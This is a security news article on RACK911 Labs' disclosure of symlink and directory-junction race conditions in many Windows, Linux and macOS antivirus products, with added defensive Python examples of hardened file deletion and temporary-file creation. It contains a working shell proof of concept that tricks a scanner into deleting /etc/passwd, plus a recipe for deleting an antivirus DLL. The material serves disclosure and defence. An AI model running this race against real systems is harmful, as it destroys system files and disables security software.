Most antiviruses turned out to be vulnerable to an attack via symbolic links

Researchers from RACK911 Labs found that almost all antivirus packages for Windows, Linux and macOS were vulnerable to attacks that manipulate race conditions during the deletion of files in which malware has been detected.

To carry out the attack, you need to place a file that the antivirus recognizes as malicious (for example, a test signature can be used) and then, at a certain moment, after the antivirus has detected the malicious file but immediately before it calls the deletion function, replace the directory containing the file with a symbolic link. On Windows, the same effect is achieved by replacing the directory with a directory junction. The problem is that almost all antiviruses did not properly check for symbolic links and, believing they were deleting a malicious file, deleted the file in the directory the symbolic link pointed to.

On Linux and macOS it is shown how an unprivileged user can use this method to delete /etc/passwd or any other system file, and on Windows, a DLL library of the antivirus itself, in order to block its operation (on Windows the attack is limited to deleting files that are not currently in use by other applications). For example, an attacker can create an "exploit" directory, place in it a file EpSecApiLib.dll containing the test virus signature, and then, before deletion, replace the "exploit" directory with a symbolic link to "C:\Program Files (x86)\McAfee\Endpoint Security\Endpoint Security Platform", which leads to the EpSecApiLib.dll library being removed from the antivirus's own directory. On Linux and macOS, a similar trick can be performed by replacing the directory with a symbolic link to "/etc".

#!/bin/sh
# Stage an EICAR test file under the name "passwd" in a user-writable directory
rm -rf /home/user/exploit; mkdir /home/user/exploit/
wget -q https://www.eicar.org/download/eicar.com.txt -O /home/user/exploit/passwd
# Each time the scanner opens the file, swap the directory for a symlink to /etc
while inotifywait -m "/home/user/exploit/passwd" | grep -m 5 "OPEN"
do
    rm -rf /home/user/exploit; ln -s /etc /home/user/exploit
done



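The defensive counterpart to the race described above, as an added example that is not part of the article or of RACK911 Labs' material: a deleter that re-resolves the full path at deletion time (the vulnerable pattern) next to one that unlinks relative to a directory handle captured at detection time and re-checks the inode it flagged (the hardened pattern). The "victim" and "exploit" directories, the file contents and the function names are all constructed for the demonstration; it assumes Linux (dir_fd support, O_DIRECTORY and O_NOFOLLOW).

```python
import os
import stat
import tempfile
import shutil

DIR_FLAGS = os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW


def open_dir_nofollow(path):
    """Return a handle to `path`, opening one component at a time with
    O_NOFOLLOW so that no component may be a symbolic link. Unlike
    os.path.realpath(), which resolves links and then trusts the result,
    this refuses links outright and leaves no window between check and use."""
    fd = os.open("/", DIR_FLAGS)
    try:
        for comp in os.path.abspath(path).split(os.sep):
            if comp:
                nfd = os.open(comp, DIR_FLAGS, dir_fd=fd)
                os.close(fd)
                fd = nfd
    except OSError:
        os.close(fd)
        raise
    return fd


def flag_for_deletion(dir_path, name):
    """Detection phase: capture a directory handle and the (dev, inode) identity
    of the entry that tested positive. Only these are trusted later."""
    dfd = open_dir_nofollow(dir_path)
    st = os.stat(name, dir_fd=dfd, follow_symlinks=False)
    return dfd, (st.st_dev, st.st_ino)


def delete_by_path(dir_path, name):
    """Vulnerable pattern: the full path is resolved again at deletion time, so a
    directory swapped for a symlink in the meantime redirects the unlink."""
    try:
        os.unlink(os.path.join(dir_path, name))
        return True
    except FileNotFoundError:
        return False


def delete_by_handle(dfd, name, identity):
    """Hardened pattern: unlink relative to the handle taken at detection time,
    and only if the entry is still the exact inode that was flagged."""
    try:
        st = os.stat(name, dir_fd=dfd, follow_symlinks=False)
    except FileNotFoundError:
        return False  # the directory we flagged is gone; delete nothing
    if stat.S_ISLNK(st.st_mode) or (st.st_dev, st.st_ino) != identity:
        return False  # entry was replaced since detection; refuse
    os.unlink(name, dir_fd=dfd)
    return True


def simulate_race(hardened):
    """Constructed scenario in a throwaway directory: 'victim' stands in for /etc
    and 'exploit' for the attacker-controlled directory of the article's script.
    Returns True if victim/passwd survived the deletion."""
    base = os.path.realpath(tempfile.mkdtemp())  # resolved once, in trusted setup
    try:
        victim = os.path.join(base, "victim")
        exploit = os.path.join(base, "exploit")
        os.mkdir(victim)
        os.mkdir(exploit)
        with open(os.path.join(victim, "passwd"), "w") as f:
            f.write("root:x:0:0:root:/root:/bin/sh\n")  # constructed stand-in
        with open(os.path.join(exploit, "passwd"), "w") as f:
            f.write("test-signature placeholder\n")     # constructed stand-in
        # 1. detection: the scanner flags exploit/passwd
        dfd, ident = flag_for_deletion(exploit, "passwd")
        # 2. race window: the directory is replaced by a symlink to victim
        os.unlink(os.path.join(exploit, "passwd"))
        os.rmdir(exploit)
        os.symlink(victim, exploit)
        # 3. deletion with one of the two patterns
        if hardened:
            delete_by_handle(dfd, "passwd", ident)
        else:
            delete_by_path(exploit, "passwd")
        os.close(dfd)
        return os.path.exists(os.path.join(victim, "passwd"))
    finally:
        shutil.rmtree(base)


def run_demo():
    """Run both deleters against the same race; reports which one kept the victim."""
    return {"path_based": simulate_race(False), "handle_based": simulate_race(True)}


if __name__ == "__main__":
    print(run_demo())  # {'path_based': False, 'handle_based': True}
```

The handle-based deleter survives the swap because the descriptor keeps referring to the original directory inode regardless of what the attacker later places at the same path name; the inode comparison additionally catches an entry that was replaced inside a directory the scanner still holds. On Windows the analogue is deleting by a handle opened with reparse-point following disabled, since junctions play the role symlinks play here.
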
In addition, many antivirus programs for Linux and macOS were found to use predictable file names when working with temporary files in /tmp and /private/tmp, which could be used to escalate privileges to the root user.

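The predictable-temporary-file problem mentioned above, shown as an added example that is not from the article or from any of the listed products: a writer that opens a fixed name such as scanner.scan with a plain open() (which follows a symlink planted there in advance) beside one that uses an unpredictable name and O_CREAT|O_EXCL|O_NOFOLLOW, so that anything already sitting at the chosen name makes the open fail instead of being written through. The "scanner" product name, the victim file and its contents are constructed; it assumes a POSIX system.

```python
import os
import secrets
import shutil
import tempfile

SAFE_FLAGS = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW


def write_temp_predictable(tmp_dir, product, data):
    """Vulnerable pattern: a fixed, guessable name is opened with open(), which
    happily follows a symlink that was planted at that name beforehand."""
    path = os.path.join(tmp_dir, f"{product}.scan")
    with open(path, "w") as f:
        f.write(data)
    return path


def create_temp_safe(tmp_dir, product, data, attempts=100):
    """Hardened pattern: unpredictable name plus O_CREAT|O_EXCL, so the open fails
    if anything (a planted symlink included) already exists at that name;
    O_NOFOLLOW is a second line of defence. Returns the path that was created."""
    for _ in range(attempts):
        path = os.path.join(tmp_dir, f"{product}.{secrets.token_hex(8)}")
        try:
            fd = os.open(path, SAFE_FLAGS, 0o600)
        except FileExistsError:
            continue  # name already taken, possibly by an attacker: pick another
        with os.fdopen(fd, "w") as f:
            f.write(data)
        return path
    raise RuntimeError("could not create a private temporary file")


def exclusive_open_refuses_existing(path):
    """True if O_CREAT|O_EXCL refuses an entry that already exists at `path`."""
    try:
        os.close(os.open(path, SAFE_FLAGS, 0o600))
        return False
    except FileExistsError:
        return True


def simulate_planted_symlink(hardened):
    """Constructed scenario: a symlink is planted at the predictable name before
    the scanner writes. Returns True if the victim file kept its contents."""
    base = os.path.realpath(tempfile.mkdtemp())
    try:
        victim = os.path.join(base, "victim_config")   # stands in for a root-owned file
        with open(victim, "w") as f:
            f.write("original\n")
        os.symlink(victim, os.path.join(base, "scanner.scan"))
        if hardened:
            create_temp_safe(base, "scanner", "scanner data\n")
        else:
            write_temp_predictable(base, "scanner", "scanner data\n")
        with open(victim) as f:
            return f.read() == "original\n"
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    print(simulate_planted_symlink(False), simulate_planted_symlink(True))  # False True
```

In practice tempfile.mkstemp() already implements the hardened pattern (random name, O_EXCL, O_NOFOLLOW); the point of spelling it out is that the name being unguessable and the open being exclusive are two separate properties, and a privileged scanner needs both.
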
By now the problems have been fixed by most vendors, but it is worth noting that the first notifications about the problem were sent to the manufacturers in the autumn of 2018. Although not all vendors have released updates, they were given at least 6 months to patch, and RACK911 Labs believes it is now free to disclose the vulnerabilities. It is noted that RACK911 Labs had been working on identifying vulnerabilities for a long time, but did not expect that working with colleagues from the antivirus industry would be so difficult, owing to delays in releasing updates and disregard for the need to urgently fix security problems.

Affected products (the free antivirus package ClamAV is not on the list):

  • Linux
    • BitDefender GravityZone
    • Comodo Endpoint Security
    • Eset File Server Security
    • F-Secure Linux Security
    • Kaspersky Endpoint Security
    • McAfee Endpoint Security
    • Sophos Anti-Virus for Linux
  • Windows
    • Avast Free Anti-Virus
    • Avira Free Anti-Virus
    • BitDefender GravityZone
    • Comodo Endpoint Security
    • F-Secure Computer Protection
    • FireEye Endpoint Security
    • Intercept X (Sophos)
    • Kaspersky Endpoint Security
    • Malwarebytes for Windows
    • McAfee Endpoint Security
    • Panda Dome
    • Webroot Secure Anywhere
  • macOS
    • AVG
    • BitDefender Total Security
    • Eset Cyber Security
    • Kaspersky Internet Security
    • McAfee Total Protection
    • Microsoft Defender (BETA)
    • Norton Security
    • Sophos Home
    • Webroot Secure Anywhere

    Source: opennet.ru
